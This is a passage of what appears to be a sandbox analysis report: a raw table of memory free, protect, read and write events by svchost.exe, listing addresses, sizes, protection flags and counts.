| Free | svchost.exe | address = 458752, free_type = MEM_RELEASE, size = 0 |
|
59 | |
| Free | svchost.exe | address = 131072, free_type = MEM_RELEASE, size = 0 |
|
69 | |
| Free | svchost.exe | address = 2424832, free_type = MEM_RELEASE, size = 0 |
|
2 | |
| Free | svchost.exe | address = 4849664, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 4784128, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 4718592, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 786432, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 917504, free_type = MEM_RELEASE, size = 0 |
|
45 | |
| Free | svchost.exe | address = 131072, free_type = MEM_RELEASE, size = 0 |
|
48 | |
| Free | svchost.exe | address = 1310720, free_type = MEM_RELEASE, size = 0 |
|
2 | |
| Free | svchost.exe | address = 1835008, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 1769472, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 1703936, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 1245184, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 720896, free_type = MEM_RELEASE, size = 0 |
|
45 | |
| Free | svchost.exe | address = 131072, free_type = MEM_RELEASE, size = 0 |
|
46 | |
| Free | svchost.exe | address = 3538944, free_type = MEM_RELEASE, size = 0 |
|
2 | |
| Free | svchost.exe | address = 3407872, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 3473408, free_type = MEM_RELEASE, size = 0 |
|
2 | |
| Free | svchost.exe | address = 3604480, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 1179648, free_type = MEM_RELEASE, size = 0 |
|
94 | |
| Free | svchost.exe | address = 131072, free_type = MEM_RELEASE, size = 0 |
|
95 | |
| Free | svchost.exe | address = 5242880, free_type = MEM_RELEASE, size = 0 |
|
2 | |
| Free | svchost.exe | address = 5111808, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 5177344, free_type = MEM_RELEASE, size = 0 |
|
2 | |
| Free | svchost.exe | address = 5308416, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 6225920, free_type = MEM_RELEASE, size = 0 |
|
2 | |
| Protect | svchost.exe | address = 268435456, protection = PAGE_READONLY, size = 1024 |
|
1 | |
| Protect | svchost.exe | address = 268439552, protection = PAGE_EXECUTE_READ, size = 9984 |
|
1 | |
| Protect | svchost.exe | address = 268451840, protection = PAGE_READONLY, size = 3532 |
|
1 | |
| Protect | svchost.exe | address = 268455936, protection = PAGE_READWRITE, size = 1004 |
|
1 | |
| Protect | svchost.exe | address = 268460032, protection = PAGE_READONLY, size = 806 |
|
1 | |
| Protect | svchost.exe | address = 268435456, protection = PAGE_READONLY, size = 1024 |
|
1 | |
| Protect | svchost.exe | address = 268439552, protection = PAGE_EXECUTE_READ, size = 9984 |
|
1 | |
| Protect | svchost.exe | address = 268451840, protection = PAGE_READONLY, size = 3532 |
|
1 | |
| Protect | svchost.exe | address = 268455936, protection = PAGE_READWRITE, size = 1004 |
|
1 | |
| Protect | svchost.exe | address = 268460032, protection = PAGE_READONLY, size = 806 |
|
1 | |
| Protect | svchost.exe | address = 268435456, protection = PAGE_READONLY, size = 1024 |
|
1 | |
| Protect | svchost.exe | address = 268439552, protection = PAGE_EXECUTE_READ, size = 342901 |
|
1 | |
| Protect | svchost.exe | address = 268783616, protection = PAGE_READONLY, size = 80188 |
|
1 | |
| Protect | svchost.exe | address = 268865536, protection = PAGE_READWRITE, size = 165288 |
|
1 | |
| Protect | svchost.exe | address = 269033472, protection = PAGE_READONLY, size = 272 |
|
1 | |
| Protect | svchost.exe | address = 269037568, protection = PAGE_READONLY, size = 480 |
|
1 | |
| Protect | svchost.exe | address = 269041664, protection = PAGE_READONLY, size = 12216 |
|
1 | |
| Protect | svchost.exe | address = 268435456, protection = PAGE_READONLY, size = 1024 |
|
1 | |
| Protect | svchost.exe | address = 268439552, protection = PAGE_EXECUTE_READ, size = 822360 |
|
1 | |
| Protect | svchost.exe | address = 269262848, protection = PAGE_READONLY, size = 145694 |
|
1 | |
| Protect | svchost.exe | address = 269410304, protection = PAGE_READWRITE, size = 128664 |
|
1 | |
| Protect | svchost.exe | address = 269541376, protection = PAGE_READWRITE, size = 9 |
|
1 | |
| Protect | svchost.exe | address = 269545472, protection = PAGE_READONLY, size = 560 |
|
1 | |
| Protect | svchost.exe | address = 269549568, protection = PAGE_READONLY, size = 480 |
|
1 | |
| Protect | svchost.exe | address = 269553664, protection = PAGE_READONLY, size = 29528 |
|
1 | |
| Protect | svchost.exe | address = 268435456, protection = PAGE_READONLY, size = 1024 |
|
1 | |
| Protect | svchost.exe | address = 268439552, protection = PAGE_EXECUTE_READ, size = 9093 |
|
1 | |
| Protect | svchost.exe | address = 268451840, protection = PAGE_READONLY, size = 7024 |
|
1 | |
| Protect | svchost.exe | address = 268460032, protection = PAGE_READWRITE, size = 1036 |
|
1 | |
| Protect | svchost.exe | address = 268464128, protection = PAGE_READONLY, size = 732 |
|
1 | |
| Protect | svchost.exe | address = 268435456, protection = PAGE_READONLY, size = 1024 |
|
1 | |
| Protect | svchost.exe | address = 268439552, protection = PAGE_EXECUTE_READ, size = 10792 |
|
1 | |
| Protect | svchost.exe | address = 268451840, protection = PAGE_READONLY, size = 4368 |
|
1 | |
| Protect | svchost.exe | address = 268460032, protection = PAGE_READWRITE, size = 1036 |
|
1 | |
| Protect | svchost.exe | address = 268464128, protection = PAGE_READONLY, size = 1020 |
|
1 | |
| Protect | svchost.exe | address = 1825832960, protection = PAGE_READONLY, size = 1024 |
|
1 | |
| Protect | svchost.exe | address = 1825837056, protection = PAGE_EXECUTE_READ, size = 5544 |
|
1 | |
| Protect | svchost.exe | address = 1825845248, protection = PAGE_READWRITE, size = 64 |
|
1 | |
| Protect | svchost.exe | address = 1825849344, protection = PAGE_READONLY, size = 432 |
|
1 | |
| Protect | svchost.exe | address = 1825853440, protection = PAGE_READWRITE, size = 36 |
|
1 | |
| Protect | svchost.exe | address = 1825857536, protection = PAGE_READONLY, size = 170 |
|
1 | |
| Protect | svchost.exe | address = 1825861632, protection = PAGE_READWRITE, size = 1336 |
|
1 | |
| Protect | svchost.exe | address = 1825865728, protection = PAGE_READONLY, size = 296 |
|
1 | |
| Protect | svchost.exe | address = 1825832960, protection = PAGE_READONLY, size = 1024 |
|
1 | |
| Protect | svchost.exe | address = 1825837056, protection = PAGE_EXECUTE_READ, size = 35348 |
|
1 | |
| Protect | svchost.exe | address = 1825873920, protection = PAGE_READWRITE, size = 6596 |
|
1 | |
| Protect | svchost.exe | address = 1825882112, protection = PAGE_READONLY, size = 2812 |
|
1 | |
| Protect | svchost.exe | address = 1825886208, protection = PAGE_READWRITE, size = 4084 |
|
1 | |
| Protect | svchost.exe | address = 1825890304, protection = PAGE_READONLY, size = 170 |
|
1 | |
| Protect | svchost.exe | address = 1825894400, protection = PAGE_READWRITE, size = 2628 |
|
1 | |
| Protect | svchost.exe | address = 1825898496, protection = PAGE_READWRITE, size = 44 |
|
1 | |
| Protect | svchost.exe | address = 1825902592, protection = PAGE_READWRITE, size = 32 |
|
1 | |
| Protect | svchost.exe | address = 1825906688, protection = PAGE_READONLY, size = 1336 |
|
1 | |
| Read | svchost.exe | address = 2147348480, size = 16 |
|
1 | |
| Read | svchost.exe | address = 6291456, size = 64 |
|
1 | |
| Read | svchost.exe | address = 6291672, size = 248 |
|
1 | |
| Read | svchost.exe | address = 393216, size = 112 |
|
119 | |
| Read | svchost.exe | address = 917504, size = 1024 |
|
1 | |
| Read | svchost.exe | address = 393216, size = 112 |
|
1 | |
| Read | svchost.exe | address = 2147340288, size = 16 |
|
1 | |
| Read | svchost.exe | address = 6291456, size = 64 |
|
1 | |
| Read | svchost.exe | address = 6291672, size = 248 |
|
1 | |
| Read | svchost.exe | address = 393216, size = 112 |
|
120 | |
| Read | svchost.exe | address = 458752, size = 1024 |
|
1 | |
| Read | svchost.exe | address = 2147303424, size = 16 |
|
1 | |
| Read | svchost.exe | address = 6291456, size = 64 |
|
1 | |
| Read | svchost.exe | address = 6291672, size = 248 |
|
1 | |
| Read | svchost.exe | address = 393216, size = 112 |
|
442 | |
| Read | svchost.exe | address = 393268, size = 28 |
|
38 | |
| Read | svchost.exe | address = 15595537, size = 127 |
|
1 | |
| Read | svchost.exe | address = 15595588, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 15595372, size = 127 |
|
1 | |
| Read | svchost.exe | address = 917504, size = 1024 |
|
2 | |
| Read | svchost.exe | address = 268848156, size = 127 |
|
37 | |
| Read | svchost.exe | address = 16318048, size = 1023 |
|
37 | |
| Read | svchost.exe | address = 16318008, size = 127 |
|
37 | |
| Read | svchost.exe | address = 6029312, size = 128 |
|
3 | |
| Read | svchost.exe | address = 2162688, size = 1024 |
|
1 | |
| Read | svchost.exe | address = 6094852, size = 4 |
|
3 | |
| Read | svchost.exe | address = 2424832, size = 1024 |
|
1 | |
| Read | svchost.exe | address = 2359296, size = 1024 |
|
1 | |
| Read | svchost.exe | address = 2147348480, size = 16 |
|
1 | |
| Read | svchost.exe | address = 6291456, size = 64 |
|
1 | |
| Read | svchost.exe | address = 6291672, size = 248 |
|
1 | |
| Read | svchost.exe | address = 393216, size = 112 |
|
255 | |
| Read | svchost.exe | address = 917504, size = 1024 |
|
1 | |
| Read | svchost.exe | address = 5373952, size = 128 |
|
1 | |
| Read | svchost.exe | address = 5308416, size = 1024 |
|
1 | |
| Read | svchost.exe | address = 5439492, size = 4 |
|
1 | |
| Read | svchost.exe | address = 393268, size = 28 |
|
20 | |
| Read | svchost.exe | address = 24049638, size = 127 |
|
2 | |
| Read | svchost.exe | address = 269384968, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 24049148, size = 127 |
|
4 | |
| Read | svchost.exe | address = 24049632, size = 127 |
|
2 | |
| Read | svchost.exe | address = 269385068, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 269385016, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 269385092, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 24442157, size = 127 |
|
1 | |
| Read | svchost.exe | address = 24442403, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 24440860, size = 127 |
|
1 | |
| Read | svchost.exe | address = 28178715, size = 127 |
|
1 | |
| Read | svchost.exe | address = 28177444, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 28177400, size = 127 |
|
1 | |
| Read | svchost.exe | address = 2147348480, size = 16 |
|
1 | |
| Read | svchost.exe | address = 6291456, size = 64 |
|
1 | |
| Read | svchost.exe | address = 6291672, size = 248 |
|
1 | |
| Read | svchost.exe | address = 393216, size = 112 |
|
139 | |
| Read | svchost.exe | address = 458752, size = 1024 |
|
1 | |
| Read | svchost.exe | address = 4718592, size = 128 |
|
1 | |
| Read | svchost.exe | address = 2490368, size = 1024 |
|
1 | |
| Read | svchost.exe | address = 4784132, size = 4 |
|
1 | |
| Read | svchost.exe | address = 28701247, size = 127 |
|
1 | |
| Read | svchost.exe | address = 28701279, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 28699872, size = 127 |
|
4 | |
| Read | svchost.exe | address = 28701241, size = 127 |
|
1 | |
| Read | svchost.exe | address = 28701253, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 28701583, size = 127 |
|
1 | |
| Read | svchost.exe | address = 28701548, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 28701235, size = 127 |
|
1 | |
| Read | svchost.exe | address = 28701305, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 28702865, size = 127 |
|
1 | |
| Read | svchost.exe | address = 28703111, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 28701568, size = 127 |
|
1 | |
| Read | svchost.exe | address = 28309300, size = 127 |
|
1 | |
| Read | svchost.exe | address = 3776592, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 28309028, size = 127 |
|
1 | |
| Read | svchost.exe | address = 24049232, size = 127 |
|
1 | |
| Read | svchost.exe | address = 3782224, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 24048948, size = 127 |
|
1 | |
| Read | svchost.exe | address = 2147299328, size = 16 |
|
1 | |
| Read | svchost.exe | address = 6291456, size = 64 |
|
1 | |
| Read | svchost.exe | address = 6291672, size = 248 |
|
1 | |
| Read | svchost.exe | address = 393216, size = 112 |
|
98 | |
| Read | svchost.exe | address = 917504, size = 1024 |
|
1 | |
| Read | svchost.exe | address = 1703936, size = 128 |
|
1 | |
| Read | svchost.exe | address = 1376256, size = 1024 |
|
1 | |
| Read | svchost.exe | address = 1769476, size = 4 |
|
1 | |
| Read | svchost.exe | address = 393268, size = 28 |
|
2 | |
| Read | svchost.exe | address = 268452188, size = 127 |
|
2 | |
| Read | svchost.exe | address = 8059264, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 268454376, size = 127 |
|
2 | |
| Read | svchost.exe | address = 268454388, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 2147348480, size = 16 |
|
1 | |
| Read | svchost.exe | address = 6291456, size = 64 |
|
1 | |
| Read | svchost.exe | address = 6291672, size = 248 |
|
1 | |
| Read | svchost.exe | address = 655360, size = 112 |
|
92 | |
| Read | svchost.exe | address = 3407872, size = 1024 |
|
2 | |
| Read | svchost.exe | address = 3473408, size = 128 |
|
1 | |
| Read | svchost.exe | address = 3538948, size = 4 |
|
1 | |
| Read | svchost.exe | address = 24050369, size = 127 |
|
1 | |
| Read | svchost.exe | address = 24050321, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 24049588, size = 127 |
|
3 | |
| Read | svchost.exe | address = 24050374, size = 127 |
|
1 | |
| Read | svchost.exe | address = 24050166, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 24050364, size = 127 |
|
1 | |
| Read | svchost.exe | address = 24050135, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 24050131, size = 127 |
|
1 | |
| Read | svchost.exe | address = 24050235, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 24048344, size = 127 |
|
1 | |
| Read | svchost.exe | address = 24050291, size = 127 |
|
1 | |
| Read | svchost.exe | address = 24050318, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 24050112, size = 127 |
|
2 | |
| Read | svchost.exe | address = 24050285, size = 127 |
|
1 | |
| Read | svchost.exe | address = 24050314, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 24050108, size = 127 |
|
1 | |
| Read | svchost.exe | address = 24050290, size = 127 |
|
1 | |
| Read | svchost.exe | address = 24050317, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 2147299328, size = 16 |
|
1 | |
| Read | svchost.exe | address = 6291456, size = 64 |
|
1 | |
| Read | svchost.exe | address = 6291672, size = 248 |
|
1 | |
| Read | svchost.exe | address = 393216, size = 112 |
|
154 | |
| Read | svchost.exe | address = 5111808, size = 1024 |
|
2 | |
| Read | svchost.exe | address = 5177344, size = 128 |
|
1 | |
| Read | svchost.exe | address = 5242884, size = 4 |
|
1 | |
| Read | svchost.exe | address = 2097152, size = 128 |
|
1 | |
| Read | svchost.exe | address = 2293764, size = 4 |
|
1 | |
| Read | svchost.exe | address = 2293760, size = 128 |
|
1 | |
| Read | svchost.exe | address = 2097152, size = 1024 |
|
1 | |
| Read | svchost.exe | address = 6160388, size = 4 |
|
1 | |
| Read | svchost.exe | address = 393268, size = 28 |
|
2 | |
| Read | svchost.exe | address = 268452748, size = 127 |
|
2 | |
| Read | svchost.exe | address = 24180476, size = 1023 |
|
1 | |
| Read | svchost.exe | address = 268456544, size = 127 |
|
2 | |
| Read | svchost.exe | address = 268456556, size = 1023 |
|
1 | |
| Write | svchost.exe | address = 0x50000, size = 367 |
|
1 | |
| Write | svchost.exe | address = 0x60000, size = 112 |
|
61 | |
| Write | svchost.exe | address = 0x602104, size = 12 |
|
1 | |
| Write | svchost.exe | address = 0x10000000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x10001000, size = 10240 |
|
2 | |
| Write | svchost.exe | address = 0x10004000, size = 3584 |
|
2 | |
| Write | svchost.exe | address = 0x10005000, size = 1004 |
|
1 | |
| Write | svchost.exe | address = 0x10005000, size = 512 |
|
1 | |
| Write | svchost.exe | address = 0x10006000, size = 1024 |
|
2 | |
| Write | svchost.exe | address = 0x20000, size = 26 |
|
4 | |
| Write | svchost.exe | address = 0xe0000, size = 12 |
|
7 | |
| Write | svchost.exe | address = 0x20000, size = 17 |
|
7 | |
| Write | svchost.exe | address = 0xe0000, size = 16 |
|
45 | |
| Write | svchost.exe | address = 0x10004018, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 14 |
|
3 | |
| Write | svchost.exe | address = 0x1000401c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 15 |
|
4 | |
| Write | svchost.exe | address = 0x10004020, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 20 |
|
6 | |
| Write | svchost.exe | address = 0x10004024, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 9 |
|
2 | |
| Write | svchost.exe | address = 0x10004028, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000402c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 12 |
|
5 | |
| Write | svchost.exe | address = 0x10004030, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 10 |
|
2 | |
| Write | svchost.exe | address = 0x10004034, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004038, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000403c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 25 |
|
1 | |
| Write | svchost.exe | address = 0x10004040, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 18 |
|
2 | |
| Write | svchost.exe | address = 0x10004044, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004048, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 24 |
|
4 | |
| Write | svchost.exe | address = 0x1000404c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004050, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 19 |
|
2 | |
| Write | svchost.exe | address = 0x10004054, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 13 |
|
4 | |
| Write | svchost.exe | address = 0x10004058, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000405c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 27 |
|
1 | |
| Write | svchost.exe | address = 0x10004060, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 6 |
|
1 | |
| Write | svchost.exe | address = 0x10004064, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004068, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 28 |
|
1 | |
| Write | svchost.exe | address = 0x1000406c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004000, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004004, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004008, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000400c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004010, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 21 |
|
2 | |
| Write | svchost.exe | address = 0x100040c8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040cc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040d0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040d4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040d8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 16 |
|
4 | |
| Write | svchost.exe | address = 0x10004080, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004084, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004088, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000408c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 22 |
|
1 | |
| Write | svchost.exe | address = 0x1000409c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040a0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 11 |
|
1 | |
| Write | svchost.exe | address = 0x100040a4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040a8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 5 |
|
1 | |
| Write | svchost.exe | address = 0x100040ac, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 7 |
|
1 | |
| Write | svchost.exe | address = 0x100040b0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040b4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040b8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040bc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040c0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004094, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004074, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004078, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0xe0000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x140000, size = 388 |
|
1 | |
| Write | svchost.exe | address = 0x150000, size = 40 |
|
1 | |
| Write | svchost.exe | address = 0x50000, size = 367 |
|
1 | |
| Write | svchost.exe | address = 0x60000, size = 112 |
|
62 | |
| Write | svchost.exe | address = 0x602104, size = 12 |
|
1 | |
| Write | svchost.exe | address = 0x10000000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x10001000, size = 10240 |
|
2 | |
| Write | svchost.exe | address = 0x10004000, size = 3584 |
|
2 | |
| Write | svchost.exe | address = 0x10005000, size = 1004 |
|
1 | |
| Write | svchost.exe | address = 0x10005000, size = 512 |
|
1 | |
| Write | svchost.exe | address = 0x10006000, size = 1024 |
|
2 | |
| Write | svchost.exe | address = 0x20000, size = 26 |
|
4 | |
| Write | svchost.exe | address = 0x70000, size = 12 |
|
7 | |
| Write | svchost.exe | address = 0x20000, size = 17 |
|
7 | |
| Write | svchost.exe | address = 0x70000, size = 16 |
|
45 | |
| Write | svchost.exe | address = 0x10004018, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 14 |
|
4 | |
| Write | svchost.exe | address = 0x1000401c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 15 |
|
4 | |
| Write | svchost.exe | address = 0x10004020, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 20 |
|
5 | |
| Write | svchost.exe | address = 0x10004024, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 9 |
|
2 | |
| Write | svchost.exe | address = 0x10004028, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000402c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 12 |
|
5 | |
| Write | svchost.exe | address = 0x10004030, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 10 |
|
2 | |
| Write | svchost.exe | address = 0x10004034, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004038, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000403c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 25 |
|
1 | |
| Write | svchost.exe | address = 0x10004040, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 18 |
|
2 | |
| Write | svchost.exe | address = 0x10004044, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004048, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 24 |
|
4 | |
| Write | svchost.exe | address = 0x1000404c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004050, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 19 |
|
2 | |
| Write | svchost.exe | address = 0x10004054, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 13 |
|
4 | |
| Write | svchost.exe | address = 0x10004058, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000405c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 27 |
|
1 | |
| Write | svchost.exe | address = 0x10004060, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 6 |
|
1 | |
| Write | svchost.exe | address = 0x10004064, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004068, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 28 |
|
1 | |
| Write | svchost.exe | address = 0x1000406c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004000, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004004, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004008, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000400c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004010, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 21 |
|
2 | |
| Write | svchost.exe | address = 0x100040c8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040cc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040d0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040d4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040d8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 16 |
|
4 | |
| Write | svchost.exe | address = 0x10004080, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004084, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004088, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000408c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 22 |
|
1 | |
| Write | svchost.exe | address = 0x1000409c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040a0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 11 |
|
1 | |
| Write | svchost.exe | address = 0x100040a4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040a8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 5 |
|
1 | |
| Write | svchost.exe | address = 0x100040ac, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 7 |
|
1 | |
| Write | svchost.exe | address = 0x100040b0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040b4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040b8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040bc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040c0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004094, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004074, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004078, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x70000, size = 1024 |
|
2 | |
| Write | svchost.exe | address = 0x100000, size = 388 |
|
1 | |
| Write | svchost.exe | address = 0x350000, size = 40 |
|
1 | |
| Write | svchost.exe | address = 0x360000, size = 20 |
|
1 | |
| Write | svchost.exe | address = 0x100000, size = 128 |
|
1 | |
| Write | svchost.exe | address = 0x370000, size = 44 |
|
1 | |
| Write | svchost.exe | address = 0x50000, size = 367 |
|
1 | |
| Write | svchost.exe | address = 0x60000, size = 112 |
|
221 | |
| Write | svchost.exe | address = 0x602104, size = 12 |
|
1 | |
| Write | svchost.exe | address = 0x10000000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x10001000, size = 343040 |
|
2 | |
| Write | svchost.exe | address = 0x10055000, size = 80384 |
|
2 | |
| Write | svchost.exe | address = 0x10069000, size = 165288 |
|
1 | |
| Write | svchost.exe | address = 0x10069000, size = 154624 |
|
1 | |
| Write | svchost.exe | address = 0x10092000, size = 512 |
|
2 | |
| Write | svchost.exe | address = 0x10093000, size = 512 |
|
2 | |
| Write | svchost.exe | address = 0x10094000, size = 12288 |
|
2 | |
| Write | svchost.exe | address = 0x20000, size = 26 |
|
7 | |
| Write | svchost.exe | address = 0xe0000, size = 12 |
|
11 | |
| Write | svchost.exe | address = 0xe0000, size = 16 |
|
187 | |
| Write | svchost.exe | address = 0x100550b8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 21 |
|
9 | |
| Write | svchost.exe | address = 0x100550bc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100550c0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 13 |
|
17 | |
| Write | svchost.exe | address = 0x100550c4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 14 |
|
13 | |
| Write | svchost.exe | address = 0x100550c8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 10 |
|
8 | |
| Write | svchost.exe | address = 0x100550cc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100550d0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 22 |
|
7 | |
| Write | svchost.exe | address = 0x100550d4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 12 |
|
17 | |
| Write | svchost.exe | address = 0x100550d8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 18 |
|
10 | |
| Write | svchost.exe | address = 0x100550dc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 15 |
|
20 | |
